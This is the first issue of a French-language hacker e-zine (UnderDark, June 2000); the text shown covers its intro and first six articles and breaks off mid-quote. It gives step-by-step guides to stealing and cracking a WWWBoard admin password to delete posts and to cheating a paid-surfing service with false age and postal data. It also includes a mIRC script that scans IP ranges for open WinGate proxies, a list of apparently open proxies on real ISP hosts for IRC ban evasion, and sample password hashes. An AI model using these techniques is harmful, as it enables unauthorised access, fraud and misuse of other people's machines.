 

     * @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ *
     @   ____    ____                              ___________                          @
     @  |UUUU|  |UUUU|__   __ ____  _____ ______  |DDDDDDDDDDD\  _____ ______   _   __  @
     @  |U  U|  |U  U|  \ |  |  _ \|  ___|  __  | |D   ___    D\/  _  \  __  | | | / /  @
     @  |U  U|  |U  U|   \   | | | \ |___| |  | | |D  |DDD\    D| |_| | |__| | | |/ /   @    
     @  |U  U|  |U  U|       | | | |  ___|  ¯¯  | |D  |D  D|   D|  _  |      | |   |    @
     @  |U  U|  |U  U|       | |_| / |___|  |\  \ |D  |D  D|   D| | | |  |\  \ | |\ \   @
     @  |U  U|__|U  U|___|\__|____/|_____|__| \__\|D  |D  D|   D|_| |_|__| \__\|_| \_\  @
     @  |U  UUUUUU  U|                            |D  |DDD/    D|                       @
     @  |U          U|                            |D   ¯¯¯    D/                        @
     @  \UUUUUUUUUUUU/                            |DDDDDDDDDDD/                         @
     @   ¯¯¯¯¯¯¯¯¯¯¯¯                              ¯¯¯¯¯¯¯¯¯¯¯                          @
     * @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ *

			
		



                     ________________________________________________________________________                   
   _____________    /   UnderDark Menu :                    Auteur:                     	   \
  /  UnderDark  \  |¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯|
 |   Numéro 01   | |     [01]	Hack d'un WWWBoard		Mind Flayer		      	    |					  	
  \  Juin 2000  /  |     [02]	Napster				[_}{Ead_]	 	      	    |
   ¯¯¯¯¯¯¯¯¯¯¯¯¯   |     [03]	All Advantage			Spyd			      	    |
                   |     [04]	/etc/passwd				Mind Flayer		      	    |
                   |     [05]	News d'UnderNet			WaxeD				     	    |
                   |     [06]	Irc Spoof				[_}{Ead_]				    |
                   |     [07]	Anonymous Mail			Mind Flayer				    |
                   |     [08]	Set A Eggdrop On A Shell	Waxed				          |
                   |     [09]	The Linux World			[ALIENS]				    |
 			 |	 [10]	Les Reseaux				RandlK				    |
			 |	 [11]	Virtual Publisher			Mind Flayer				    |
			 |	 [12] Cheapest Hacking 			Mind Flayer				    |
			 |	 [13] Find a Pass				vi0l4t0r				    |
	             |	 [14] Warez 101				Bilb0					    |
    		       |	 [15] Eggdrop Exploit			Mind Flayer				    |	
			 |	 [16]	Mini Tayser pour débutant	{Sm[U]g}		                |
	   	       |	 [17]	Breve histoire de Unix		Mind Flayer				    |
			 |												    |
			 |__________________________________________________________________________|	
			  \________________________________________________________________________/


 Intro Par Mind Flayer
 =====================


 Bon, alors on se lance dans l'écriture de notre propre zine. Pourquoi un autre zine alors
 que la scene francophones en est remplis? Tout simplement pour préparer l'avenir de la scène
 québecoise,Iga et pyrofreak font du bon travail, mais ces groupes ont leur maniere de 
 fonctionner, leur philosophie propre. Si la scene comprends plus de facons de voir les choses, 
 plus d'une facon de travailler et de publier, je crois que ce n'est que pour le mieux.
 Bon maintenant parlons de nous, nous sommes un groupe d'individu réunit pour faire 
 avancer les choses, réunit pour faire profiter de notre savoir ceux qui veulent apprendre, 
 réunit pour prouver que la scène quebecoise est solide et faite pour durer. Aussi, nous 
 tenterons d'aider les gens voulant plus d'information sur un sujet mentioner dans le zine ou 
 tout autre sujet relié au monde de l'informatique. Nous sommes aussi la pour apprendre se que 
 nous n'avons pas encore appris. Aussi, vous ne verez jamais d'articles sur l'anarchie genre 
 plan de bombes dans notre zine. Tout simplement pour faire suite a un évenement qui c'est 
 passé en Suisse qui nous prouve que mettre des plans de bombes sur le net n'est surement pas 
 une chose tres intelligente a faire, je vous invite a lire le texte que l'on peux trouver 
 sur madchat.org a se sujet.
 

 Les recentes et tristes nouvelles nous incitent a "enlever le plastique et arracher des pages"
 des Fanzines diffuses sur le net. Ce qui est evidemment impossible, compte tenu
 du respect que l'on doit a toute publication. Alors...
 Adieu a mAdchAt tel que vous le connaissez ?
   
 Avec des bêtises comme ceux la, vous remettez en cause les principes memes de la liberte
 d'expression et d'information, en general et en particulier sur internet.
 Donc egalement le principe meme des publications et sites web libres que nous aimons.

 C'est tout simpement l'histoire de 2 jeune suisse qui se sont blessé grievement en montant
 une bombe donc les plan avais été trouver sur le net. Dans un souci de legalité et question
 de ne pas avoir des morts sur la conscience, UnderDark s'engage formellement a ne jamais
 divulger de plan de bombes dans ces e-zines. Ceci Étant dit, j'espere que vous apprecier
 notre zine et pouvez nous ecrire pour nous laisser vos commentaires ou vos articles pour le
 #2. Ecrivez-moi a MindFlayer@underdark.cc et/ou venez nous voir sur #UnderDark sur UnderNet.


	*************************************************************************
	* 				Random Quote Player					*			
      *<^>si on se met en tite gagne de twit qui pense toute pareil on va     *
	*    rester une tite gagne de twit toute notre vie				*
      *												*
      *************************************************************************

 Disclaimer
 ==========
 Bon voila la partie chiante du zine, fack j'va essayer de faire ca bref. Nous considerons que
 ce zine est legal donc si vous n'etes pas d'accord, veiller clicker dans le tit X en haut a
 droite. Aussi, ce zine est interdit au l33t qui save tout et qui critique tout le monde juste
 parce qui on rien d'autre a faire. On dit pas qu'on est parfait alors venez nous dire
 ce que vous penser du zine sur #underdark. Aussi, le groupe en entier ne peux etre retenu 
 responsable de quoi que se soit, alors si un de nous fait quelque chose d'illegal, les autre 
 ne peuvent etre tenu responsable de ses actes. Aussi nous encourageaons personne a hacker, 
 nous essayons seulement d'aider les admin a securiser leur reseaux (si si , si c'est écrit 
 c'est que c'est vrai bon). Bon c pas mal tout si vous etes tanner de lire un disclamer bin 
 y fini la.



	*************************************************************************
	* 			Random Quote Player						*			
      *<SALYM> spy tu veux que je te montre comment etre op en 2 seconde 	*
      * et virer tous les autres?								*
	*<SpyD> faire un to autrement dit?							*
	*<SALYM> si tu veux ouais								*
	*<SpyD> ouais										*
	*<SALYM> tu chante le generique de Santa Barbara je tassure 		*
      *  	 effet garanti						       		*
	*   												*
      *												*
      *************************************************************************


    ___________________________________________________
   / 						       		 \		
  | [01]-- Hack d'un WWWBoard					  |
  | 	   			Par Mind Flayer		        |
  |                       				        |
  |							              | 
   \___________________________________________________/


 Si votre site web utilise le script cgi WWWboard de Matt's Script Archive
 (www.worldwidemart.com/scripts) vous pouvez etre vulnerable a ceux qui vont tenter de vous
 voler votre mot de passe et deleter des messages. Malheureusement (ou heureusement) pour vous
 le site de Matt recense ceux qui utilise son script a l'adresse suivante 
 http://www.worldwidemart.com/scripts/examples/wwwboard.shtml


 Par default, vous devez mettre le passwd.txt dans le meme repertoire que le wwwboard.
 Le passwd.txt contient votre mot de passe crypter.
 Alors, n'importe qui peux voir le passwd.txt et le decrypter a l'aide de programme comme
 Crackerjack ou John the Ripper. La plupart des passwords seront rapidement decoder.

 Pour ceux qui utilise se cript sur leur site web vous voulez surement savoir comment 
 fixer le probleme. C'est tres simple, il suffit de renommer passwd.txt et d'editer vos 
 script cgi en fonction de se nouveau nom de fichier. Essayer de prendre un mot de passe 
 difficile pour ne pas etre facilemeent crackable. Le meilleur conseil reste toujours de
 ne pas utiliser se script. Noter aussi que les premieres versions ne cryptais meme pas 
 le mot de passe.


 Comment cracker le passwd.txt 
 =============================

 Bon comment cracker se passwd.txt. Vous verrez que ce n'est pas vraiment difficile.
  
 Le fichier passwd.txt ne contient qu'un login et qu'un password encrypter.

 Par exemple:
 km:aeMkCtJZYkUnI

 Par default, le login et le pass sont
 Username: WebAdmin
 Password: WebBoard

 Normalement, il ne marcheront cepandant pas :(

 Il faut cepandant modifier le passwd.txt pour qu'il ressemble a un fichier etc/passwd UNIX.
 Le fichier utilise le meme type d'encryption et est donc vulnerable au crackage.

 (Question) Que veux-tu dire par editer le passwd.txt
 (Reponse) Faites qu'il ressemble a ca

 km:aeMkCtJZYkUnI:275:15:James. "Tiger" Gordon: /usr/email/users/jgordon:/bin/csh

 Sauvegarder le .txt et ouvrer John pour commencer le crackage.

 Une fois que vous avez le moT de passe, retourner au site ou vous avez trouver le passwd.txt et
 regarder le dossier ou se trouvais le passwd.txt. Si ils utilisent la configuration standart
 vous aller voir un fichier nommer wwwboard.pl ou .cgi. 99% du temps il ne renomme pas le 
 fichier de l'admin qui est wwwadmin.pl ou .cgi. Il est aussi possible de retrouver ces fichier
 dans le dossier cgi-bin du site, fouillez un peu pis vous devriez le trouver. 
 Et voila, vous pouvez effacer les messages que vous voulez. Bon, vous aller me dire qu'il est 
 carrement inutile de deleter des msg dans un forum. Je vous l'accorde c'est vrai mais j'ai 
 ecrit cette article pour vous montrer quelque chose. Tout simplement que le plus petit des 
 trou de securité qui donne une fonction la plus useless possible peux etre un danger. Tout 
 simplement en se mettant dans la peau d'un admin. Vous avez un pass a retenir pour le 
 guestbook, le shell, le ftp, le wwwboard, aller vous etre capable de retenir des 10aines de 
 pass different? Certain admins marque leur mot de passe sur papier se qui est plus securitaire. 
 Mais certain admin prenne aussi le meme mot de passe pour le wwwboard que pour le ftp, le 
 shell etc.. Donc un trou de securité a l'air anodin est devenu un danger majeur pour la 
 securité du serveur.

									Mind Flayer

  
                 .-.
 	       (, )O()
  	     ( )O.( ')o.
  	     |XXXXXXXX|O	Ce e-zine est commandité par Molson qui vous rappelle que
   	     |//\\//\\|o	plus on est soul, plus on rit.
	  /.-|\\//\\//|	Ce e-zine vous est aussi presenté par les Alcooliques Anonymes
	 ||  |//\\//\\|	qui vous rappelle que plus vous etes soul, plus on rit de vous.
	  \'-|\\//\\//|
 	   `"|//\\//\\|
   	     |XXXXXXXX|
   	     `""`""`""`



	*************************************************************************
	* 				Random Quote Player					*			
      *								 				*
      *<NuClEaR> underdark ??									*
	*<NuClEaR> kc ca ?									*
	*<NuClEaR> une marque de toster ? 							*
	*												*
	*************************************************************************



    ___________________________________________________
   / 						      		 \		
  | [02]-- Introduction a Napster			     	  |
  | 	   			Par [_}{Ead_]			  |
  |                       					  |
  |									  | 
   \___________________________________________________/


 Qui connais pas Napster?  Peut-être vous?  Et bien j'ai décidé de vous en parle.  Napster est 
 un programme qui a été crée par 4 personnes surnommés grongron, Carbonboy, Jordy et `zero 
 en 1999.

 Quelle fonctionnement Napster utilise-t-il et permet-il?
 Pendant l'installation, tous les mp3 de l'utilisateurs sont placés dans une bibliothèque.  
 Une fois connecté sur Napster, cette liste est envoyé au serveur pour y être ajouté aux 
 données. Ensuite vous pourrez allé parler avec d'autre utilisateurs, écoutez vos propre 
 mp3 sans ouvrir winamp grâce à l'intégration d'un mp3 player, faire des recherches sur des 
 mp3 en particulier, regardez la liste de mp3 des autres usagers, download tous les mp3 que 
 vous voulez.

 Mais qu'est-ce qu'un mp3?
 Un mp3 est un format de fichier qui est compressé par une perte de données.  L'intérêt 
 principal d'un mp3 est d'atteindre un taux de compressions important de fichier sons (Wavs) 
 sans brisée sa qualité sonore.  Les mp3 sont de taille d'alentours de 1 Mo pour une minute 
 de son CD ou un fichier wav prendrait environ 50 Mo.  Bien sur les mp3 ne sont pas légal 
 dû au copyright mais bon ;) 
 
 ***Mind Flayer has joined article #2

 Les mp3s sont légal si on possede une copie originale du cd

 ***Mind Flayer has left article #2

 Quelque avantages:
 - Napster prend peu de place sur ton HD après l'installation (1 Mo).
 - Napster ne coûte rien pour l'utiliser.
 - Vous pouvez download environ tous les mp3 que vous recherchez parmi les connections des 
   utilisateurs (33k, 56k, Câble, T1, T3 et plus).

 Quelque désavantages:
 -Quand vous vous connectez sur Napster, votre ordinateur deviens un serveur de download.
 - Les autres utilisateur ne reste pas 24 heures sur 24 connecté sur Napster.
 - Les gens jase peu sur les channel.

 Quelque commandes.
 Voici quelque commandes de style IRC utilisée dans le chat:

  syntaxe:  /command <Paramètre requis> <Paramètre secondaire>

  Commandes:	
  /banlist	La liste des adresse IP bannie
  /clear	Effacer l'écran
  /join <channel>	Join un channel
  /part [channel]	Quitter un channel
  /motd	Voir le message du jour (Le texte rouge quand tu entre dans un channel sur Napster)
 /msg <user> <message> 	Envoyez un messages en prive a un utilisateur
 /whois <user>	Voir si un utilisateur est online


	
 Et bien voilà! Vous savez environ tout sur Napster maintenant.  Pas trop dure hein!  
 Allez le download à www.napster.com pis si vous avez d'autre question a propos de ce 
 programme et bien faite comme moi, lisez le help ou le faq. ;) 


   									[_}{Ead_]


 P.S. : Apres avoir recu l'article de [_}{Ead_], j'ai trouver un petit bug qui permet de ne pas 
 se faire sucer sa bandwitch quand on est sur napster. Il suffit tout simplement lors de 
 l'installation de ne pas laisser napster faire une library de nos mp3s en pesant sur cancel.
 Apres il suffit de se connecter au serveur et vous verez le nombre de vos mp3 downloadable
 sera de 0. Donc plus personne pour ralenetir vos downloads. (C'est pas tres gentil mais bon,
 on a pas tous des t3 a la maison)
									Mind Flayer



	*************************************************************************
	* 				Random Quote Player					*			
      *												*
	*	<DaNgER16> parle de clan 2600							*
	*	<DaNgER16> attend je lais connais toute					*
	*	<DaNgER16> ma aller les chercher						*
	*												*
	* 												*									
	*************************************************************************



    ___________________________________________________
   / 						       		 \		
  | [03]-- All Advantage				        |
  | 	   			Par Spyd			        |
  |                       					  |
  |									  | 
   \___________________________________________________/



 AllAdvantage ( http://fr.alladvantage.com )

'jour, moi, jvais vous parler de AllAdvantage et des triches possibles avec.  AllAdvantage est 
une compagnie du type "Paid For Surf" (être payé pour surfer).  Le principe est que vous êtes 
payé 50¢/heure pour etre dans votre navigateur tout en gardant ouverte leur viewbar (c'est le 
nom de leur prog barre de pub, que l'on peut surement effacer avec windows sniper...jamais 
essayé).  50¢/heure et + quand vous avez des referrals qui marchent...maximum 25h/mois, 
bientot 40...c'est assez alléchant nan?  Moi, j'ai fait 50$ la dernière fois...reste a voir le 
chèque milieu juin.  C'est une des plus vieilles machines (compagnies à faire du $$$) et 
l'une des plus reconnues et respectées.  Aussi l'une des plus payantes et...l'une des plus 
facile à extorquer.

Je vais tout d'abord vous expliquer les caractéristiques que l'on doit accomplir pour etre 
en état de gagner de l'argent.

1-Être dans un navigateur internet (en l'occurence IE ou Netscape)
2-Surfer    Cette exigence comporte des limites que voici :
	1-Au bout d'environ 2 minutes où le curseur n'a pas cliqué dans le navigateur, ca 
	  arrete le $$$
	2-Au bout d'anviron 7 minutes pù le curseur n'a pas bougé, la viewbar se cache 
	  automatiquement(elle arrete).

	3-LA VIEWBAR DOIT ETRE OUVERTE!!!!!!!!!

À partir de tout ceci, on peut établir des failles utilisables pour faire des cracks.  Ces 
cracks peuvent nous servir pour rendre valide les mots "être payé pour chatter ou pour lire 
ses mails sur the bat".  Comme vous pouvez penser, l'on peut faire un fakesurf.  Vous 
connaissez surement le programme du meme nom.  Il est détecté pas à peu près toutes les 
compagnies.  Mais dans l'underground, il est extrêmement  aisé de trouver des programmes 
faits à la main par de talentueux programmeurs.  Je préfère ne pas donner de noms.

Les progs en question simulent habituellement une connexion ou des transferts de données sur 
le port 80 (le port web).  Et la viewbar alladvantage surveille justement ce port pour savoir 
si la personne mérite bien son $$$.  Pour savoir si l'on gagne du $$$ avec alladvantage (sur 
la derniere version de la viewbar), on n'a qu'à regarder si la tête du bonhomme en bas à 
gauche sur la viewbar est verte.  Si vous voulez plus d'infos sur les cracks de ce genre, 
contactez moi (n'oubliez pas que ceci n'est destiné qu'a un pur titre informatif), les 
coordonnées sont au bas de l'article.

Maintenant, je vais vous parler de la triche à l'inscription.  Tout d'abord, il faut que vous 
sachiez qu'il y a des lois qui régissent certains comportements.  Les lois en question sont 
principalement reliées à celle-ci : LA PUTAIN DE LOI SUR LES ALCOOLS ET LES JEUX.  Il faut 
quand meme savoir que les compagnies de "paid for surf" ne seraient rien sans les jeunes qui 
trichent sur leur age.  J'espère que vous comprenez qu'il faut mettre un âge supérieur à 21 
ans (car c'est pas partout que c'est 18 ans l'âge minimum d'adulte).  Ca, c'est la 1ere triche 
d'inscription.  À noter qu'il faut tenir compte du lien âge-date de naissance...  La 2e triche 
est liée au pouvoir de download de la viewbar.  Au québec (désolé pour ceux d'ailleurs, je ne 
sais pas quoi faire), on m'a dit qu'il n'y a que le monde de la région de mtl qui peut 
downloader la viewbar immédiatemment après l'inscription...pourquoi?  je n'en ai aucune idée.
Une faille dans cette idée : il se basent sur le code postal DE L'INSCRIPTION.  
J'explique : lors de votre inscription, peu importe d'où vous êtes au québec, pour tricher 
une 2e fois, il faut que vous rentriez un faux code postal commencant par "H"  
genre H** ***(il faut pas oublier l'éthique du code postal québécois : lettre-chiffre-lettre 
Chiffre-lettre-chiffre).  Après l'inscription, vous allez immédiatemment downloader la 
viewbar dans votre account.  Après cela, vous allez modifier vos informations de compte, 
c-a-dire le code postal, mais cette fois, vous mettez le votre.  Pourquoi ne pas dire que 
l'on est des USA?  Tout simplement parce que l'adresse, le pays, ces infos ne sont pas 
remodifiables!


Je sais que quelques astuces incluses dans cet article sont connues d'un peu tlm, mais il 
faut penser au peu de monde qui ne les connaissent pas.  Et aussi, n'allez pas penser que 
j'ai copié tout ceci, mais pensez que j'ai fait une compilations des astuces connues!  
J'accepterais volontiers vos commentaires, car c'est mon 1er article!

Bon $$$!

SpyD

Note : si vous voulez bien me référer sur alladvantage, inscrivez ce #ID : HJG-374 
( en me référant, vous ne perdez aucun$$$, tout ce que vous faites, c'est me faire gagner 5¢ 
à chaque heure que vous faites!  Vous ne perdez rien :) )

Pour me contacter : Par mail, coolvbt@hotmail.com ou par ICQ #48620037



	*************************************************************************
	* 				Random Quote Player					*			
      *												*
	*<Marv|N> rire des tamoules quand t sul buvard c drole en esprit		*
	*												*
	* 												*									
	*************************************************************************



    ___________________________________________________
   / 						       		 \
  | [04]-- The /etc/passwd 101				  |
  | 	   			Par Mind Flayer		        | 
  |                       				        |
  |							              |
   \___________________________________________________/


 Tout systeme linux possede un etc/passwd. Que retrouvons-nous dans le etc/passwd? Dans les
 vieille version de linux ou celle qui ne possede pas la Shadow-Suite nous y retrouvons entre
 autre le login/pass des utilisateurs (le pass etant bien sur crypter). Dans les nouvelles 
 versions de Linux possedant la Shadow-Suite par defaut nous y retrouvons les meme informations
 que dans le etc/passwd moins le mot de passe crypter (qui est contenu dans le etc/shadow, 
 fichier ne pouvant etre lut que par l'utilisateur root). La structure du etc/passwd est 
 celle-ci:
 
 Nom:Mot de passe:Numéro utilisateur:Numéro groupe:Spécial:Répertoire:Programme de démarrage

 Voici une explication de chaque champ:

 Nom: Le login de l'utilisateur, il est normalement unique, dans le cas contraire, seul le 
 premier nom sera lu par la machine.
 
 Mot de passe: Le mot de passe crypter devrait etre la. Si la suite Shadow-Suite est installé,
 il ne contient que la lettre x car le mot de passe se trouve dans le fichier etc/shadow.
 Quand le mot de passe est dans le fichier etc/passwd, sa longueur est de 13 caracteres, chacun
 appartenant a un alphabet de 64 caracteres. Les deux premiers caracteres definisse le type
 de cryptage employé. En théorie, il existes 4096 types de cryptage différent. Le principe
 est le meme dans le fichier etc/shadow. Apres les 13 caracteres du mot de passe crypter, une
 série d'indication permette d'assurer les fonctions de password aging peuve etre ajouté apres
 une virgule. Les indication pouvant etre ajouté sont les suivantes:
 - Nombre maximal de semaines de validité du mot de passe.
 - Délai minimal à partir duquel le mot de passe peux etre changer
 - Date du dernier changement de mot de passe.

 Numéro d'utilisateur et de groupe: Ces 2 numéros sont des nombres entiers qui determinent les 
 droits d'accès des utilisateurs sur le fichiers, ainsi que les droits applicables à la 
 communication entre les processus. Il est utile d'affecter des numéro uniques aux utilisateurs
 Linux utilise un systeme a deux classes pour les utilisateurs. Un utilisateur peut avoir
 un numéro égal a 0, ou un autre numéro. Dans le premier cas, il a acces a tout, dans le second
 cas, le systeme analysera ses droits. La commande ls, utilisé en format long, exploite le 
 contenu du fichier etc/passwd pour determiner le nom d'utilisateur à partir du numéro UID 
 de l'inode. Les noms de groupes et de leurs membres sont enregistrés dans le ficheir etc/group.

 Champ Spécial: Ce champ peux contenir n'importe quel texte. Pour l'inscrire, il faut utiliser
 le programme usermod ou useradd ou encore la commande chfn. Certains programmes exploitent
 le contenu de ce champ et l'affichent à la place du nom de l'utilisateur.

 Répertoire de base: Le répertoire de base d'un utilisateur est enregistré ici et devrais etre 
 choisi de maniere unique. Il est toujours defini par un chemin absolu compris dans le systeme
 des fichiers inclus au moment de la connexion. Aussi, l'utilisateur doit etre propriaitaire de
 ce repertoire de base.

 Programme de démarrage: Le dernier champ de chaque ligne du fichier /etc/passwd désigne le 
 programme qui doit être executé lors de la connexion de l'utilisateur. Tout les programmes
 autorisées doivent etre inscrits dans le fichier /etc/shells/.

 Aussi pour facilité la comprenhension de cet article, j'ai décidé de donner un exemple de 
 /etc/passwd/ sur un orsi qui ne possede pas la Shadow Suite.

 root:mryRE5ZxzHWa6:0:1:System PRIVILEGED Account:/:/bin/tcsh
 field:asCvRJUxeJkXw:0:1:Field Service PRIVILEGED Account:/usr/field:/bin/csh
 csaba:xRpsKfU4vM.u2:271:79:ferencz csaba:/u/SRG:/bin/tcsh
 szilard:CjnuXvxxlxdZA:272:79:pasztor szilard:/u/SRG:/bin/tcsh
 peti:rltaIP/kX0nZY:273:79:bognar peter:/u/bognar:/bin/tcsh
 dof:Mwl4/b8RNX4cE:276:79:dovenyi peter:/u/SRG:/bin/tcsh
 bazsola:HdP99Mvvc17h.:277:79:Szekely Balazs:/u/szekely:/bin/tcsh
 bagoly:IPCHDmdQb8xIM:1001:31:Bagoly Zsolt:/u/bagoly:/usr/bin/ksh


	*************************************************************************
	* 				Random Quote Player					*			
      *												*
	*<netlord> tsé.. euh.. un eggdrop, c pas vraiment brillant			*
	*<netlord> IGA.. écoute moi..								*
	*<netlord> set pas le +i								*
	*<netlord> parce que sinon, le monde peut pas entrer				*
	*<netlord> tu comprends ?								*			*
	* 												*									
	*************************************************************************


    ___________________________________________________
   / 						       		 \
  | [05]-- News From The UnderNet				  |
  | 	   			Par WaxeD		              | 
  |                       				        |
  |							              |
   \___________________________________________________/


 - Voici une nouvelle qui pourrait vous intéresser... VeNeMoUS n'a plus
 le choix de ce tenir tranquille suite à la publication de son nom,
 adresse et numéro de téléphone à tout les usagers qui fréquent Undernet.

 Suite à cette prise en charge par l'administration d'Undernet, un autre
 des leaders du terrorisme sur le réseau "cen" a écrit aux opérateurs
 pour lui faire par qu'il n'attaquerait plus les serveurs et que cela
 était rendu beaucoup trop loin.

 Un autre membre Coolio a été appréhendé par le FBI et fut arrêté à son
 domicile pour les attaques concernant DARE et yahoo.com

 Pour ce qui est de pWr il est maintenant sous surveillance et très
 tranquille.

 Espérant que ces petites mise à jour puisse vous servir :)


									WaxeD




	*************************************************************************
	* 				Random Quote Player					*			
      *<g463> nuke nabber ?									*
	*<g463> jme souviens d'avoir entendu ca comme programme quand j'étais 	*
	*	  encore dans le ventre de ma mere						*
	*												*
	*************************************************************************



    ___________________________________________________
   / 						       		 \
  | [06]-- Irc Spoof						  |
  | 	   			Par [_}{Ead_]		        | 
  |                       				        |
  |							              |
   \___________________________________________________/



  1. Qu'est-ce que Spoofer?  À quoi ca sert?  Comment peut-on en faire
        un?  Peut-on se faire bannir par des opérateurs(@) de channel?
        Doit on utiliser des programmes?  Ou peut-on l'utilise?  Et bien
        j'ai décidé de vous en parler.

     2. Qu'est ce que Spoofer?  Spoofer est un moyen tres simple de
        changer ton adresse pour une autre.  À quoi ca sert?  Quand tu
        spoof ca te permet non seulement de changer ton adresse, mais
        quand tu te fais kickban par un opérateur(@) et bien tu peux
        revenir.  Alors il est impossible de te faire bannir d'un
        channel.  Mais tu peux aussi apporter un clone sans que les
        opérateurs s'en rendent compte, car tu n'auras pas la même
        adresse.  Vous devrez avoir un programme pour parvenir a Spoofer,
        sinon vous devrez utiliser l'addons qui remplacera WinGate dans
        votre mIRC.  (Le Spoofing est utilisé sur les server de l'irc.)

     3. Avant de continuer vous devrez vous procurer un programme pour
        trouver les server Gate.  Vous pouvez utiliser WinGate que vous
        trouverez à http://web.netsysteme.net/pixel/progs/wGateScan-3.0.exe
        ou sinon vous pouvez prendre l'addons pour mIRC qui est au #7.
        Une fois que vous avez un programme pour trouver les Gates vous
        devez scanner le ip du gars.  Pour ca il existe une commande
        dans mIRC (Merci à toi Khaled) qui est la suivante:
        /DNS <NICK> (Exemple: /DNS [_}{Ead_]) et vous receverez une 
        réponse du server qui est la suivante:

	*** Looking up ppp-5800-01a-3234.que.total.net
	*** Resolved ppp-5800-01a-3234.que.total.net to 216.210.54.234

     4. Maintenant que vous avez le IP qui est 216.210.54.234, vous
        devrez le scanner à partir de votre programme qui trouvera le
        server Gate. Si vous utilisez WinGate vous devrez utilisez la
        photo

                          o--|---------------------|--o
                          |/¯                       ¯\|
                          |         WGate.gif         |
                          |\_                       _/|
                          o--|---------------------|--o

     5. Je vais vous expliquer comment le faire fonctionner.  À
        l'endroit où c'est marque HOSTNAME ou IP, tu marques le IP du
        gars (Exemple: 216.210.54.234).  Ensuite a SCAN THE PORT # tu
        mets 23 car 23 c'est le port du server Gate.  Maintenant y te 
        reste juste à pèses sur le ti piton Scan!  Une fois tout terminé,
        ça devrait vous donner comme sur la photo WGate.gif.  Si vous
        voyez des adresses IP a droite dans Server(s) found alors vous
        avez trouvé des server Gates!!!!

     6. Une fois que vous avez un Gate, il ne vous reste qu'à
        l'utiliser!  Alors vous devez entrer dans votre mIRC, allez dans
        FILE/OPTIONS.../CONNECT/FIREWALL.  Une fois rendu dedans vous
        devez entrer les informations.  Premièrement vous devez cocher
        la case USE SOCKS FIREWALL.  Ensuite dans HOSTNAME vous marquez
        le IP du server Gate (Exemple: 216.210.54.134).  Dans la case
        PORT vous devrez y ecrire le port 1080.  Une fois fait, pesez sur
        OK et allez vous connecter sur un server irc (Exemple: /server
        toronto.on.ca.undernet.org).  C'est tout pour ce qui en est du
        mIRC.  Allez regarder la photo IrcWGate.gif pour voir si vous
        avez place les bonnes choses a leur place.

                          o--|---------------------|--o
                          |/¯                       ¯\|
                          |        IrcWGate.gif       |
                          |\_                       _/|
                          o--|---------------------|--o


     7. Si vous voullez utiliser l'addons pour mIRC alors voici le code:

;o---------------------------------------------o
;| Simple Manual-WingateScanner by Pixel/EdeNa |
;|---------------------------------------------|
;| Scan: /wgscan <Domain IP> <IPS> <IPe> <TO>  |
;|  Domain IP: 3 premiers chiffres IP          |
;|  IPS: Valeur init du dernier chiffre IP     |
;|  IPE: Valeur finale du dernier chiffre IP   |
;|  TO: Time Out (Defaut: 3)                   |
;|     Ex: /wgscan 207.253.103 1 255 3         |
;| Pour stopper le scan: /wgstop               |
;o---------------------------------------------o

/wgscan {
  if ($1 == $null) set %domain $?="Domain IP a scanner -3 chiffres IP- (Ex:207.253.103) ?"
  else set %domain $1
  if ($2 == $null) set %ips $?="Valeur initiale du dernier chiffre IP (Ex:1) ?"
  else set %ips $2
  if ($3 == $null) set %ipe $?="Valeur finale du dernier chiffre IP (Ex:255) ?"
  else set %ipe $3
  if ($4 == $null) set %cto 3
  else set %cto $4
  %ipts = %ipe - %ips
  %ipc = %ips
  timer9 %ipts %cto dowgscan
  window @WGate
  aline @WGate *** Scan lance entre: %domain $+ . $+ %ips et %domain $+ . $+ %ipe - Tim ***
}
/dowgscan {
  aline @WGate - Scanning %domain $+ . $+ %ipc
  server %domain $+ . $+ %ipc 23
  inc %ipc
  if (%ipc > %ipe) wgstop
}
/wgstop {
  timer9 off
  aline @WGate *** Scan Stoppe! ***
}
;o---------------------------------------------o

     8. Et c'est ainsi que finis l'article...  Je vous souhaite de
        bien vous amusez.  Mais pas trop de conneries, malgre que c'est
        toujours le fun de s'amuser à faire chier le monde sur irc. 


			    [ [_}{Ead_] head_53@hotmail.com ]


 Bonus, Chez UnderDark, on est pas cheap, on vous donne une petite liste de wingate pour vous 
 permette de tester sans avoir a scanner.

 Videotron.net
-------------
24.200.144.241		modemcable241.144-200-24.mtl.mc.videotron.net
24.201.120.92		modemcable092.120-201-24.mtl.mc.videotron.net
24.201.120.141		modemcable141.120-201-24.mtl.mc.videotron.net
24.200.178.18		modemcable018.178-200-24.que.mc.videotron.net
24.200.192.11		modemcable011.192-200-24.hull.mc.videotron.net
24.200.198.82		modemcable082.198-200-24.que.mc.videotron.net
24.200.23.178 		modemcable178.23-200-24.timi.mc.videotron.net


Planetcable.net
---------------
24.137.18.26		x1-6-00-50-ba-a0-bd-98.cust.planetcable.net
24.137.18.44		x1-6-00-60-b0-66-08-f7.cust.planetcable.net
24.137.18.212		x1-6-00-50-04-11-50-2e.cust.planetcable.net
24.137.18.217		x1-6-00-4f-49-00-75-b6.cust.planetcable.net

Cgocable.ca
-----------
24.226.164.11		164-11.tr.cgocable.ca
205.237.37.136		37-136.dr.cgocable.ca
24.226.128.235		128-235.tr.cgocable.ca

Cybercable.tm.fr
----------------
195.132.21.39		r21m39.cybercable.tm.fr

Divers
------
207.236.200.66		ch-angrignon.qc.ca
167.206.189.37		hunt189-37.optonline.net
216.184.159.93		hs1-93.irv.zyan.com


	*************************************************************************
	* 				Random Quote Player					*
	*<Scytale> En parlant de choses sérieuses, faudrait mettre un topic 	*
	*défini pour qu'on sache de koi on va parler (théoriquement l'orga de 	*
	*Madchat mais on ne sait jamais - surtout avec moi ;)				*
	*<CYBz> bah change le si tu veux scy :)						*
	*<ulysse31> moi, je comptais parler du sacrifice des loups le samedi 	*
	*soir...											*
	*<wOLFling> c'est vrai, ils sont trop gentils les loups			*
	*<wOLFling> sacrifier leurs soirées ciné pour venir a des reunions 	*
	*stupides...										*
	*<CYBz-Tnet> oui ...									*
	*<CYBz-Tnet> et pis K aussi avait son mot a dire il est pas la		*
